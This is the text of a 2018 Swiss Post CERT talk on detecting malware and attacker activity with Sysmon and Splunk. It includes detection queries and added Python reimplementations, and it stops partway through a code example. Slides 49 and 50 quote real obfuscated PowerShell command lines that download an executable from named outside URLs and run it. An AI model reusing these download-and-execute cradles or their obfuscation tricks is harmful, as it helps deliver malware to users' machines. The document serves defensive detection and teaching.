Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk) - PowerPoint PPT Presentation



SLIDE 1

Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk)

Tom Ueltschi, Swiss Post CERT

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 1

SLIDE 2

C:\> whoami /all

• Tom Ueltschi
• Swiss Post CERT / SOC / CSIRT, since July 2007 (almost 11 years!)
  – Focus: Malware Analysis, Threat Intel, Threat Hunting, Red Teaming
• Talks about «Ponmocup Hunter» (Botconf, DeepSec, SANS DFIR Summit)
• BotConf 2016 talk with same title
• Member of many trust groups / infosec communities
• FIRST SIG member (Malware Analysis, Red Teaming)
• Twitter: @c_APT_ure

SLIDE 3

Outline

• Introduction on Sysmon and public resources
• Brief recap of BotConf 2016 talk with examples
• Threat Hunting & Advanced Detection examples
  – Malware Delivery
  – Persistence Methods
  – Internal Recon
  – Lateral Movement
  – Internal Peer-to-Peer C2 using Named Pipes
  – Detecting Mimikatz (even file-less / in-memory)

SLIDE 4

Standing on the Shoulders of Giants

• It’s hard to come up with totally new ideas and approaches
• Know and use what’s already available out there
• Share experiences of what works and how

SLIDE 5

Pyramid of Pain

I want to be able to detect this!

SLIDE 6

Sqrrl on Threat Hunting

Most examples belong here

SLIDE 7

Sqrrl on Threat Hunting

SLIDE 8

Sqrrl on Threat Hunting

SLIDE 9

MITRE ATT&CK Matrix (Tactics)

• Examples will cover
  – Persistence (Registry, Filesystem)
  – Discovery / Lateral Movement / Execution (WMI)
  – Command and Control (Named Pipes)
  – Credential Access (Mimikatz)

SLIDE 10

MITRE ATT&CK Matrix (Techniques)

SLIDE 11

MITRE ATT&CK Matrix (Techniques)

SLIDE 12

MITRE ATT&CK Matrix (DGA)

SLIDE 13

MITRE ATT&CK Matrix (T&T)

SLIDE 14

MITRE ATT&CK Matrix (ABDC)

SLIDE 15

MITRE ATT&CK Matrix

Contributions are welcome

SLIDE 16

MITRE ATT&CK Matrix

SLIDE 17

MITRE Cyber Analytics Repository

SLIDE 18

MITRE Cyber Analytics Repository

SLIDE 19

MITRE CARET (Analytics ↔ T&T Matrix)

Map Analytics to T&T Matrix

SLIDE 20

MITRE CARET (Analytics ↔ T&T Matrix)

CAR: Exec of susp cmds
T&T: Discovery / many

SLIDE 21

MITRE CARET (Analytics ↔ T&T Matrix)

CAR: Remote exec via WMI
T&T: Execution / WMI

SLIDE 22

Threat Hunting Project

SLIDE 23

Threat Hunting Project

SLIDE 24

ThreatHunter Playbook

SLIDE 25

Florian Roth’s Sigma Project

SLIDE 26

Florian Roth’s Sigma Project

SLIDE 27

Florian Roth’s Sigma Project

SLIDE 28

Florian Roth’s Sigma Project

SLIDE 29

Florian Roth’s Sigma Project

SLIDE 30

Florian Roth’s Sigma Project

SLIDE 31

Florian Roth’s Sigma Project

Way to go, Neo! ☺

SLIDE 32

Thomas Patzke’s EQUEL Project

SLIDE 33

Mike Haag’s Sysmon DFIR Github

SLIDE 34

Why Sysmon? RSA Con Talk M.R.

SLIDE 35

Why Sysmon? RSA Con Talk M.R.

Callouts: DLL / Proc Injection; Time stomping

SLIDE 36

Why Sysmon? RSA Con Talk M.R.

SLIDE 37

Why Sysmon? RSA Con Talk M.R.

Callout: new event types in v5 & v6 (not covered in prev talk)

SLIDE 38

Why Sysmon? RSA Con Talk M.R.

SLIDE 39

Why Sysmon? RSA Con Talk M.R.

SLIDE 40

Why Sysmon? RSA Con Talk M.R.

SLIDE 41

SwiftOnSecurity’s Sysmon configs

SLIDE 42

Brief Recap of BotConf 2016 Talk

SLIDE 43

Recap BotConf Talk (1/2)

Using the free Sysmon tool you can search / alert for known malicious process behaviors
• Image names / paths (wrong paths)
  – svchost.exe, %APPDATA%\Oracle\bin\javaw.exe
• CommandLine parameters
  – /stext, vssadmin delete shadows, rundll32 qwerty
• Parent- / Child-Process relationships
  – winword.exe -> explorer.exe, wscript.exe -> rundll32.exe
• Process injection
  – -> winlogon.exe

SLIDE 44

Recap BotConf Talk (2/2)

Using the free Sysmon tool you can hunt for suspicious process behaviors
• Lateral movement using admin shares
  – ADMIN$, C$, IPC$ (\\127.0.0.1\...)
• Internal C&C P2P comms over named pipes / SMB
  – processes using port 445 between workstations
• Rarest processes connecting thru proxy (or directly to Internet)
  – count by hashes, IMPHASHes, clients, image names
• Suspicious Powershell activity
  – Powershell -EncodedCommand | -enc …

SLIDE 45

Advanced Detection (Adwind RAT)

alert_sysmon_java-malware-infection

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1"
    (Users AppData Roaming (javaw.exe OR xcopy.exe)) OR (cmd cscript vbs)
| search Image="*\\AppData\\Roaming\\Oracle\\bin\\java*.exe*"
    OR (Image="*\\xcopy.exe*" CommandLine="*\\AppData\\Roaming\\Oracle\\*")
    OR CommandLine="*cscript*Retrive*.vbs*"

JBifrost RAT

SLIDE 46

Detecting Keyloggers

• Keyloggers and Password-Stealers abusing NirSoft tools
  – Limitless Logger
  – Predator Pain
  – HawkEye Keylogger
  – iSpy Keylogger
  – KeyBase Keylogger

CommandLine: <PATH-TO-EXE>\*.exe /stext <PATH-TO-TXT>\*.txt
CommandLine: <PATH-TO-EXE>\*.exe /scomma ...

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" ( stext OR scomma )
| search CommandLine="* /stext *" OR CommandLine="* /scomma *"

SLIDE 47

Detecting Keyloggers

• BONUS: detecting new Banking Trojan variant (Heodo/Emotet)
  – Link in email to download JS from web server (DHL__Report__*.js)
  – Executing JS downloads EXE from web server
  – EXE uses «/scomma» parameter (YARA: NirSoft strings in memory)

SLIDE 48

Detecting Keyloggers

• BONUS: detecting new Banking Trojan variant (Heodo/Emotet)

SLIDE 49

Malicious PowerShell

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" (powershell.exe OR cmd.exe)
| eval CommandLine2=replace(CommandLine,"[ '+\"\^]","")
| search (Image="*\\powershell.exe" OR Image="*\\cmd.exe")
    CommandLine2="*WebClient*" CommandLine2="*DownloadFile*"

Callout: the eval removes all obfuscation chars (space, quotes, +, ^)

Sample CommandLine:
"C:\Windows\System32\cmd.exe" /c powershell -command (("New-Object Net.WebClient")).("'Do' + 'wnloadfile'").invoke( 'http://unofficialhr.top/tv/homecooking/tenderloin.php', 'C:\Users\***\AppData\Local\Temp\spasite.exe'); & "C:\Users\***\AppData\Local\Temp\spasite.exe"

CommandLine2 (after replace):
C:\Windows\System32\cmd.exe/cpowershell-command((New-ObjectNet.WebClient)).(Downloadfile).invoke(http://unofficialhr.top/tv/homecooking/tenderloin.php,C:\Users\purpural\AppData\Local\Temp\spasite.exe);&C:\Users\purpural\AppData\Local\Temp\spasite.exe

• De-obfuscate simple obfuscation techniques
• Are all (obfuscation) problems solved?

SLIDE 50

Malicious PowerShell

Sample CommandLine:
cmd.exe /c powershell -c $eba = ('exe'); $sad = ('wnloa'); (( New-Object Net.WebClient )).( 'Do' + $sad + 'dfile' ).invoke( 'http://golub.histosol.ch/bluewin/mail/inbox.php' 'C:\Users\*****\AppData\Local\Temp\doc.' + $eba); start('C:\Users\*****\AppData\Local\Temp\doc.' + $eba)

«De-obfuscated»:
powershell-c$eba=(exe);$sad=(wnloa);((New-ObjectNet.WebClient)).(Do$saddfile).invoke(http://golub.histosol.ch/bluewin/mail/inbox.phpC:\Users\*****\AppData\Local\Temp\doc.$eba);start(C:\Users\*****\AppData\Local\Temp\doc.$eba)

Callout: query doesn’t match «DownloadFile» (the method name is only assembled from $sad at run time)

• LNK with Powershell command
  – embedded in DOCX file (oleObject.bin)

Sample from 2016-11-18:
d8af6037842458f7789aa6b30d6daefb  Abrechnung # 5616147.docx
2b9c71fe5f121ea8234aca801c3bb0d9  Beleg Nr. 892234-32.lnk

Strings from oleObject.bin:
E:\TEMP\G\18.11.16\ch1\golub\Beleg Nr. 892234-32.lnk
C:\Users\azaz\AppData\Local\Temp\Beleg Nr. 892234-32.lnk
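An added example (not from the talk) that reproduces the query's normalisation step in Python and runs it over two constructed command lines shaped like slides 49 and 50, showing why the second one slips past the *DownloadFile* match; URLs and paths are placeholders.

```python
import re

# Same character class as the slide's Splunk eval:
#   eval CommandLine2=replace(CommandLine,"[ '+\"\^]","")
# i.e. strip spaces, single and double quotes, '+' and '^'.
STRIP_CHARS = re.compile(r"""[ '+"^]""")


def normalize_cmdline(cmdline: str) -> str:
    """Collapse simple string-splitting tricks ('Do' + 'wnloadfile', caret
    escapes, stray quotes) so the hidden keyword becomes contiguous again."""
    return STRIP_CHARS.sub("", cmdline)


def matches_download_cradle(cmdline: str) -> bool:
    """Equivalent of the slide's search clause: the normalised command line
    must contain both *WebClient* and *DownloadFile* (case-insensitive, as
    Splunk wildcard searches are)."""
    norm = normalize_cmdline(cmdline).lower()
    return "webclient" in norm and "downloadfile" in norm


# Constructed samples modelled on slides 49 and 50 (URLs and paths are
# placeholders, not the ones from the talk).
# Slide 49 style: the method name is split with '+', which the normaliser joins.
SAMPLE_CONCAT = (
    r'"C:\Windows\System32\cmd.exe" /c powershell -command '
    r"""(("New-Object Net.WebClient")).("'Do' + 'wnloadfile'").invoke("""
    r"'http://example.invalid/x.php', 'C:\Users\user\AppData\Local\Temp\a.exe')"
)
# Slide 50 style: part of the name lives in a variable, so the keyword never
# appears in the command line at all and the stripped form still does not match.
SAMPLE_VARIABLE = (
    r'cmd.exe /c powershell -c $sad = ("wnloa"); '
    r"""(( New-Object Net.WebClient )).( 'Do' + $sad + 'dfile' ).invoke("""
    r"'http://example.invalid/y.php', 'C:\Users\user\AppData\Local\Temp\doc.exe')"
)

if __name__ == "__main__":
    for name, sample in (("concat", SAMPLE_CONCAT), ("variable", SAMPLE_VARIABLE)):
        print(f"{name}: normalised = {normalize_cmdline(sample)}")
        print(f"{name}: matches    = {matches_download_cradle(sample)}")
```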

SLIDE 51

Processes connecting thru Proxy

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=1
    [ search index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=3
          Image="*\\Users\\*" DestinationHostname="proxy.fqdn"
      | stats by ComputerName ProcessGuid
      | fields ComputerName ProcessGuid ]
| fields Hashes ComputerName Image ParentImage
| rex field=Hashes ".*MD5=(?<MD5>[A-F0-9]*),IMPHASH=(?<IMPHASH>[A-F0-9]*)"
| rex field=Image ".*\\\\Users\\\\(?<username>[^\\\\]+)\\\\.*"
| rex field=Image ".*\\\\+(?<proc_name>[^\\\\]+\.[eE][xX][eE]).*"
| rex field=ParentImage ".*\\\\+(?<pproc_name>[^\\\\]+\.[eE][xX][eE]).*"
| stats dc(ComputerName) AS CLIENTS, dc(MD5) AS CNT_MD5, dc(Image) AS CNT_IMAGE,
        values(username) AS Users, values(ComputerName) AS Computers, values(MD5) AS MD5,
        values(proc_name) AS proc_name, values(pproc_name) AS pproc_name
    by IMPHASH
| where CLIENTS < 15
| sort -CLIENTS

• IMPHASH = Import Hash
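An added example, not code from the talk, that implements the same two-stage logic in Python over constructed Sysmon events: the subsearch for user-profile processes reaching the proxy, the join back to process creations by ProcessGuid, and the stacking by IMPHASH with the CLIENTS < 15 cut-off. proxy.fqdn is the slide's placeholder.

```python
import re
from collections import defaultdict

PROXY = "proxy.fqdn"        # placeholder hostname, as in the slide's query
CLIENT_THRESHOLD = 15       # "| where CLIENTS < 15"

# The slide's three rex extractions, as Python regexes.
HASHES_RE = re.compile(r"MD5=(?P<MD5>[A-F0-9]*),IMPHASH=(?P<IMPHASH>[A-F0-9]*)")
USER_RE = re.compile(r".*\\Users\\(?P<username>[^\\]+)\\")
PROC_RE = re.compile(r".*\\(?P<proc_name>[^\\]+\.[eE][xX][eE])")


def user_procs_via_proxy(events):
    """The subsearch: (ComputerName, ProcessGuid) of every EventCode 3 where an
    image under \\Users\\ connected to the proxy."""
    return {
        (e["ComputerName"], e["ProcessGuid"])
        for e in events
        if e["EventCode"] == 3
        and e.get("DestinationHostname") == PROXY
        and "\\Users\\" in e["Image"]
    }


def stack_by_imphash(events, threshold=CLIENT_THRESHOLD):
    """Join the subsearch keys back to EventCode 1, then stack by IMPHASH:
    binaries built from the same toolkit share an import hash even when their
    MD5 and file name differ, so a rare IMPHASH surfaces renamed droppers."""
    keys = user_procs_via_proxy(events)
    fields = ("Computers", "MD5", "Images", "Users", "proc_name", "pproc_name")
    stacks = defaultdict(lambda: {f: set() for f in fields})
    for e in events:
        if e["EventCode"] != 1 or (e["ComputerName"], e["ProcessGuid"]) not in keys:
            continue
        h = HASHES_RE.search(e["Hashes"])
        if not h:
            continue
        s = stacks[h["IMPHASH"]]
        s["Computers"].add(e["ComputerName"])
        s["MD5"].add(h["MD5"])
        s["Images"].add(e["Image"])
        if (u := USER_RE.match(e["Image"])):
            s["Users"].add(u["username"])
        if (p := PROC_RE.match(e["Image"])):
            s["proc_name"].add(p["proc_name"])
        if (pp := PROC_RE.match(e["ParentImage"])):
            s["pproc_name"].add(pp["proc_name"])
    rows = []
    for imphash, s in stacks.items():
        rows.append({
            "IMPHASH": imphash,
            "CLIENTS": len(s["Computers"]),      # dc(ComputerName)
            "CNT_MD5": len(s["MD5"]),            # dc(MD5)
            "CNT_IMAGE": len(s["Images"]),       # dc(Image)
            **{f: sorted(s[f]) for f in ("Users", "Computers", "MD5", "proc_name", "pproc_name")},
        })
    # Rarest first here; the slide's "sort -CLIENTS" lists the most common first.
    return sorted((r for r in rows if r["CLIENTS"] < threshold), key=lambda r: r["CLIENTS"])


def make_sample():
    """Constructed Sysmon events, not real telemetry: 16 hosts run the same
    browser build (common IMPHASH, removed by the threshold), one host runs a
    Java binary from %APPDATA% (rare IMPHASH), and svchost is ignored because
    it does not live under \\Users\\."""
    chrome = r"C:\Users\alice\AppData\Local\Google\Chrome\Application\chrome.exe"
    events = []
    for i in range(16):
        host, guid = f"WS{i:03d}", f"{{guid-chrome-{i}}}"
        events.append({"EventCode": 1, "ComputerName": host, "ProcessGuid": guid, "Image": chrome,
                       "ParentImage": r"C:\Windows\explorer.exe",
                       "Hashes": f"MD5={'A' * 32},IMPHASH={'1' * 32}"})
        events.append({"EventCode": 3, "ComputerName": host, "ProcessGuid": guid, "Image": chrome,
                       "DestinationHostname": PROXY})
    javaw = r"C:\Users\bob\AppData\Roaming\Oracle\bin\javaw.exe"
    events.append({"EventCode": 1, "ComputerName": "WS099", "ProcessGuid": "{guid-javaw}",
                   "Image": javaw, "ParentImage": r"C:\Users\bob\AppData\Local\Temp\invoice.exe",
                   "Hashes": f"MD5={'B' * 32},IMPHASH={'2' * 32}"})
    events.append({"EventCode": 3, "ComputerName": "WS099", "ProcessGuid": "{guid-javaw}",
                   "Image": javaw, "DestinationHostname": PROXY})
    events.append({"EventCode": 3, "ComputerName": "WS099", "ProcessGuid": "{guid-svchost}",
                   "Image": r"C:\Windows\System32\svchost.exe", "DestinationHostname": PROXY})
    return events


if __name__ == "__main__":
    for row in stack_by_imphash(make_sample()):
        print(row)
```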

SLIDE 52

SMB traffic between WS

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=3 Initiated=true
    DestinationPort=445 Image!=System
    (SourceHostname="WS*" DestinationHostname="WS*") OR (SourceIp="10.10.*.*" DestinationIp="10.10.*.*")
| where SourceIp!=DestinationIp
| stats by ComputerName ProcessGuid
| fields ComputerName ProcessGuid

(The field-to-field test SourceIp!=DestinationIp has to run in a where command; inside the base search it would compare SourceIp against the literal string "DestinationIp".)

• Search for network connections
  – SMB protocol (dst port 445)
  – Source and destination are workstations (hostname or IP)
  – Use «ProcessGuid» to correlate with other event types (proc’s)
• Search for legitimate SMB servers (filers, NAS)
  – Create «whitelist» to exclude as legit dest
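An added example (not the talk's code) that applies the slide's filter and the whitelist step to constructed EventCode 3 records and pivots to the process images via ProcessGuid; the 10.10.0.0/16 range and the FILER01/NAS01 whitelist are assumptions.

```python
import ipaddress

WS_NET = ipaddress.ip_network("10.10.0.0/16")   # the slide's 10.10.*.* as a CIDR (assumed)
LEGIT_SMB_SERVERS = {"FILER01", "NAS01"}        # constructed whitelist of filers / NAS


def both_workstations(e):
    """(SourceHostname="WS*" DestinationHostname="WS*") OR
       (SourceIp="10.10.*.*" DestinationIp="10.10.*.*")"""
    src_h, dst_h = e.get("SourceHostname", ""), e.get("DestinationHostname", "")
    if src_h.upper().startswith("WS") and dst_h.upper().startswith("WS"):
        return True
    try:
        return (ipaddress.ip_address(e["SourceIp"]) in WS_NET
                and ipaddress.ip_address(e["DestinationIp"]) in WS_NET)
    except ValueError:
        return False


def ws_to_ws_smb(events):
    """EventCode 3 filter from the slide plus the whitelist step: initiated
    connections to port 445 between two workstations, not from the kernel
    'System' image, not to a known SMB server. Returns the (ComputerName,
    ProcessGuid) keys the slide uses to pivot to other event types."""
    hits = set()
    for e in events:
        if e["EventCode"] != 3 or not e.get("Initiated", False):
            continue
        if e["DestinationPort"] != 445 or e["SourceIp"] == e["DestinationIp"]:
            continue
        if e["Image"] == "System":
            continue
        if e.get("DestinationHostname", "").upper() in LEGIT_SMB_SERVERS:
            continue
        if both_workstations(e):
            hits.add((e["ComputerName"], e["ProcessGuid"]))
    return hits


def images_for(events, keys):
    """Pivot: which process images (EventCode 1) belong to the flagged keys."""
    return sorted({e["Image"] for e in events
                   if e["EventCode"] == 1 and (e["ComputerName"], e["ProcessGuid"]) in keys})


def make_sample():
    """Constructed events (not real telemetry)."""
    def conn(host, guid, image, src_h, src_ip, dst_h, dst_ip, port=445, initiated=True):
        return {"EventCode": 3, "ComputerName": host, "ProcessGuid": guid, "Image": image,
                "Initiated": initiated, "SourceHostname": src_h, "SourceIp": src_ip,
                "DestinationHostname": dst_h, "DestinationIp": dst_ip, "DestinationPort": port}
    rundll = r"C:\Windows\SysWOW64\rundll32.exe"
    tmpexe = r"C:\Users\bob\AppData\Local\Temp\update.exe"
    return [
        # workstation -> workstation over SMB from rundll32: flagged
        conn("WS001", "{g1}", rundll, "WS001", "10.10.1.1", "WS002", "10.10.1.2"),
        # same host talking to the file server: whitelisted
        conn("WS001", "{g1b}", r"C:\Windows\explorer.exe", "WS001", "10.10.1.1", "FILER01", "10.10.9.9"),
        # kernel SMB redirector traffic: excluded by Image!=System
        conn("WS003", "{g3}", "System", "WS003", "10.10.1.3", "WS004", "10.10.1.4"),
        # hostnames missing (reverse lookup failed) but both IPs in the WS range: flagged
        conn("WS005", "{g5}", tmpexe, "", "10.10.1.5", "", "10.10.7.7"),
        # destination outside the workstation range and no WS hostname: ignored
        conn("WS006", "{g6}", rundll, "WS006", "10.10.1.6", "", "10.20.1.1"),
        # port 445 but not initiated locally (inbound): ignored
        conn("WS007", "{g7}", rundll, "WS007", "10.10.1.7", "WS008", "10.10.1.8", initiated=False),
        {"EventCode": 1, "ComputerName": "WS001", "ProcessGuid": "{g1}", "Image": rundll},
        {"EventCode": 1, "ComputerName": "WS005", "ProcessGuid": "{g5}", "Image": tmpexe},
        {"EventCode": 1, "ComputerName": "WS003", "ProcessGuid": "{g3}", "Image": "System"},
    ]


if __name__ == "__main__":
    keys = ws_to_ws_smb(make_sample())
    print(sorted(keys), images_for(make_sample(), keys))
```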

SLIDE 53

Lateral Movement (admin shares)

CS_Lateral_Movement_psexec
10/18/2016 11:17:12 PM
LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 Type=Information ...
Message=Process Create:
  Image: \\127.0.0.1\ADMIN$\8c0cb58.exe
  CommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe
  CurrentDirectory: C:\Windows\system32\
  User: NT AUTHORITY\SYSTEM
  IntegrityLevel: System
  ParentImage: C:\Windows\system32\services.exe
  ParentCommandLine: C:\Windows\System32\services.exe

• Search for admin share names in image paths

C:\Windows\system32\services.exe -> \\127.0.0.1\ADMIN$\8c0cb58.exe

SLIDE 54

Lateral Movement (admin shares)

CS_Lateral_Movement_psexec
10/18/2016 11:17:13 PM
LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 Type=Information ...
Message=Process Create:
  Image: C:\Windows\SysWOW64\rundll32.exe
  CommandLine: C:\Windows\System32\rundll32.exe
  CurrentDirectory: C:\Windows\system32\
  User: NT AUTHORITY\SYSTEM
  IntegrityLevel: System
  ParentImage: \\127.0.0.1\ADMIN$\8c0cb58.exe
  ParentCommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe

• Search for admin share names in image paths

C:\Windows\system32\services.exe -> \\127.0.0.1\ADMIN$\8c0cb58.exe -> C:\Windows\system32\rundll32.exe

SLIDE 55

Lateral Movement (proc injection)

CS_Lateral_Movement_psexec
10/18/2016 11:17:13 PM
LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=8 EventType=4 Type=Information ...
Message=CreateRemoteThread detected:
  SourceProcessId: 29340
  SourceImage: \\127.0.0.1\ADMIN$\8c0cb58.exe
  TargetProcessId: 18476
  TargetImage: C:\Windows\SysWOW64\rundll32.exe
  NewThreadId: 20060
  StartAddress: 0x0000000000110000
  StartFunction:

• Search for rarest source or target images from proc injection

\\127.0.0.1\ADMIN$\8c0cb58.exe -> C:\Windows\system32\rundll32.exe

SLIDE 56

Keylogger (proc injection)

CS_Keylogger_injection
10/26/2016 11:56:32 PM
LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=8 EventType=4 Type=Information ...
Message=CreateRemoteThread detected:
  SourceProcessId: 17728
  SourceImage: C:\Windows\SysWOW64\rundll32.exe
  TargetProcessId: 836
  TargetImage: C:\Windows\System32\winlogon.exe
  NewThreadId: 14236
  StartAddress: 0x0000000000C20000
  StartFunction:

• Suspicious proc injection into «winlogon.exe»
  – Steal user’s password while logging on or unlocking screensaver

C:\Windows\SysWOW64\rundll32.exe -> C:\Windows\system32\winlogon.exe
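An added example, not from the talk, that parses events in the layout shown on slides 53 to 56 and applies the three hunts they describe (admin-share image paths, CreateRemoteThread from a share or into winlogon.exe, rarest source/target pairs); the csrss.exe noise events are constructed so the stacking step has something to rank.

```python
import re
from collections import Counter

# Admin shares as they appear in image paths: \\<host>\ADMIN$\..., \\<host>\C$\..., \\<host>\IPC$\...
ADMIN_SHARE_RE = re.compile(r"^\\\\[^\\]+\\(?:ADMIN\$|C\$|IPC\$)\\", re.IGNORECASE)


def parse_event(block: str) -> dict:
    """Parse one event as Splunk renders it: a header line of key=value pairs
    (LogName, SourceName, EventCode, ...) followed by the Sysmon Message body
    with one 'Field: value' per line."""
    head, _, body = block.strip().partition("\n")
    ev = {m.group(1): m.group(2) for m in re.finditer(r"(\w+)=(\S+)", head)}
    ev["EventCode"] = int(ev["EventCode"])
    for line in body.splitlines():
        key, sep, value = line.partition(":")
        if sep:                      # "Process Create:" yields an empty value, harmless
            ev[key.strip()] = value.strip()
    return ev


def admin_share_exec(ev: dict) -> bool:
    """Slides 53/54: a process whose Image or ParentImage was launched from an
    admin share UNC path (the psexec-style service binary and its children)."""
    return ev["EventCode"] == 1 and any(
        ADMIN_SHARE_RE.match(ev.get(field, "")) for field in ("Image", "ParentImage"))


def suspicious_remote_thread(ev: dict) -> bool:
    """Slides 55/56: CreateRemoteThread (EventCode 8) whose source image comes
    from an admin share, or whose target is winlogon.exe."""
    if ev["EventCode"] != 8:
        return False
    source, target = ev.get("SourceImage", ""), ev.get("TargetImage", "")
    return bool(ADMIN_SHARE_RE.match(source)) or target.lower().endswith("\\winlogon.exe")


def rarest_injection_pairs(events, n=3):
    """Stack (SourceImage, TargetImage) pairs of EventCode 8, rarest first,
    which is how slide 55 hunts without a fixed signature."""
    pairs = Counter((e["SourceImage"].lower(), e["TargetImage"].lower())
                    for e in events if e["EventCode"] == 8)
    return sorted(pairs.items(), key=lambda kv: kv[1])[:n]


HEADER = "LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon"

# Constructed raw events modelled on slides 53 to 56 (paths and PIDs follow the
# slides; timestamps and the csrss noise are made up).
RAW_EVENTS = [
    f"""10/18/2016 11:17:12 PM {HEADER} EventCode=1 EventType=4 Type=Information
Message=Process Create:
Image: \\\\127.0.0.1\\ADMIN$\\8c0cb58.exe
CommandLine: \\\\127.0.0.1\\ADMIN$\\8c0cb58.exe
User: NT AUTHORITY\\SYSTEM
ParentImage: C:\\Windows\\system32\\services.exe""",
    f"""10/18/2016 11:17:13 PM {HEADER} EventCode=1 EventType=4 Type=Information
Message=Process Create:
Image: C:\\Windows\\SysWOW64\\rundll32.exe
CommandLine: C:\\Windows\\System32\\rundll32.exe
ParentImage: \\\\127.0.0.1\\ADMIN$\\8c0cb58.exe""",
    f"""10/18/2016 11:17:13 PM {HEADER} EventCode=8 EventType=4 Type=Information
Message=CreateRemoteThread detected:
SourceProcessId: 29340
SourceImage: \\\\127.0.0.1\\ADMIN$\\8c0cb58.exe
TargetProcessId: 18476
TargetImage: C:\\Windows\\SysWOW64\\rundll32.exe
StartAddress: 0x0000000000110000""",
    f"""10/26/2016 11:56:32 PM {HEADER} EventCode=8 EventType=4 Type=Information
Message=CreateRemoteThread detected:
SourceImage: C:\\Windows\\SysWOW64\\rundll32.exe
TargetImage: C:\\Windows\\System32\\winlogon.exe
StartAddress: 0x0000000000C20000""",
] + [
    f"""10/26/2016 11:5{i}:00 PM {HEADER} EventCode=8 EventType=4 Type=Information
Message=CreateRemoteThread detected:
SourceImage: C:\\Windows\\System32\\csrss.exe
TargetImage: C:\\Windows\\explorer.exe""" for i in range(5)
]

EVENTS = [parse_event(raw) for raw in RAW_EVENTS]


def hunt(events=EVENTS):
    return {
        "admin_share_exec": [e["Image"] for e in events if admin_share_exec(e)],
        "remote_threads": [(e["SourceImage"], e["TargetImage"])
                           for e in events if suspicious_remote_thread(e)],
        "rarest_pairs": rarest_injection_pairs(events),
    }


if __name__ == "__main__":
    for key, value in hunt().items():
        print(key, value)
```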

SLIDE 57

SLIDE 58

Hunting for Delivery of Malware

• Malicious files downloaded via Browser
• Sysmon «FileCreateStreamHash» events generated
• Remember the malicious JS files from email links? (Heodo/Emotet)

SLIDE 59

Hunting for Delivery of Malware

• Remember that JS Filename from before?
• Let’s hunt for that… (DHL__Report__*.js)

SLIDE 60

Hunting for Delivery of Malware

SLIDE 61

Hunting for Delivery of Malware

SLIDE 62

Hunting for Delivery of Malware

SLIDE 63

Hunting for Delivery of Malware

SLIDE 64

Hunting for Delivery of Malware

SLIDE 65

Hunting for Delivery of Malware

NEW: Email link clicked; Doc file downloaded

SLIDE 66

Hunting for Delivery of Malware

NEW: Doc file opened

SLIDE 67

Hunting for Delivery of Malware

NEW: Word doc macro enabled

SLIDE 68

Detecting Persistence Methods

• Hunting for Persistence Methods
  – Registry Keys
  – Filesystem (e.g. Startup folders)

SLIDE 69

Detecting Persistence (Registry)

• Searching for «Run» or «RunOnce» keys

SLIDE 70

Detecting Persistence (Registry)

SLIDE 71

Detecting Persistence (Registry)

SLIDE 72

Detecting Persistence (Filesystem)

• Example for «ProcessCreate», not «FileCreate»

SLIDE 73

Detecting Persistence (Filesystem)

This should make you go «Hmmm??»

SLIDE 74

Detecting Persistence (Filesystem)

• Example for «FileCreate»
• Less than 400 results in > 2 months
  – after tuning exclusion list

SLIDE 75

Detecting Persistence (Filesystem)

SLIDE 76

Detecting Persistence (Filesystem)

SLIDE 77

Detecting Internal Recon

• Internal Recon used as preparation for Lateral Movement
• Legit system commands used
• Can also be used by sysadmins or users
• Baseline and find appropriate thresholds
  – Number of different commands and time window

SLIDE 78

Detecting Internal Recon

SLIDE 79

Detecting Internal Recon

SLIDE 80

Detecting Internal Recon

SLIDE 81

Detecting Internal Recon

SLIDE 82

Detecting Internal Recon

SLIDE 83

Detecting Internal Recon

• 3 or more (of 7) different commands executed within 15 min

SLIDE 84

Detecting Internal Recon

15 occurrences, 6 different cmds within 15 mins

SLIDE 85

Detecting Internal Recon

3 different cmds within 3 mins; «False detections» are possible (Explorer -> cmd.exe)
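An added example (not the talk's code) of the thresholding described on slides 77 to 85: a sliding window per host and user that fires when 3 or more distinct commands land within 15 minutes, keeping the parent images so the explorer -> cmd.exe case can be recognised in triage. The command set is an assumption, since the deck's seven commands are only shown on an image slide.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed set of discovery commands (the deck's seven are only on an image slide
# and are not reproduced here); typical ATT&CK Discovery binaries stand in.
RECON_CMDS = {"whoami.exe", "net.exe", "net1.exe", "ipconfig.exe",
              "nltest.exe", "systeminfo.exe", "tasklist.exe"}
WINDOW = timedelta(minutes=15)   # slide 83: within 15 min
MIN_DISTINCT = 3                 # slide 83: 3 or more different commands


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_recon(events, window=WINDOW, min_distinct=MIN_DISTINCT):
    """Per (host, user), slide a time window over recon process creations and
    report the window holding the most distinct commands once it reaches the
    threshold. Parent images are kept so an analyst can spot the slide-85 case
    (explorer -> cmd.exe, i.e. a human typing) when triaging."""
    by_key = defaultdict(list)
    for e in events:
        if e["EventCode"] == 1 and basename(e["Image"]) in RECON_CMDS:
            by_key[(e["ComputerName"], e["User"])].append(
                (e["UtcTime"], basename(e["Image"]), basename(e["ParentImage"])))
    alerts = []
    for (host, user), rows in by_key.items():
        rows.sort()
        best, start = None, 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1
            span = rows[start:end + 1]
            cmds = {r[1] for r in span}
            if len(cmds) >= min_distinct and (best is None or len(cmds) > len(best["commands"])):
                best = {"host": host, "user": user, "first": span[0][0], "last": span[-1][0],
                        "occurrences": len(span), "commands": sorted(cmds),
                        "parents": sorted({r[2] for r in span})}
        if best:
            alerts.append(best)
    return alerts


def make_sample():
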